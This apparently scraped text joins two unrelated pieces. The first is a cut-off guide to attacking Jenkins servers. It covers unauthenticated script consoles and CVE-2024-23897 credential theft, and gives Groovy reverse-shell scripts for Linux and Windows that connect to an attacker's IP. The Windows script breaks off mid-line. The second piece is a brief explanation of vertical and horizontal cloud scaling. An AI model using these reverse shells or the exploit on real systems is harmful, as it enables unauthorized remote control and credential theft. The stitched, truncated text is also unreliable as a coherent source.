Exploiting Jenkins / CVE-2024-23897 Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script If you don't have access to script console and the version is vulnerable to CVE-2024-23897 , then exploit it to read files and get authentication credentials for Jenkins, (explained below) Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script. For Linux, r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() For Windows, String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea...
Scaling up/Vertical Scaling and Scaling Out/Horizontal Scaling. These terms are used often in the Cloud referring to the flexible way of increasing the performance and computing.
Scaling Up or Vertical scaling means to increase the memory, storage or compute power on an existing virtual machine. For example, you can add additional memory to a database server to make it run faster.
Scaling Out or Horizontal scaling means to add extra virtual machines to power your application. You may create many virtual machines configured together and use a Load-Balancer to distribute work across them.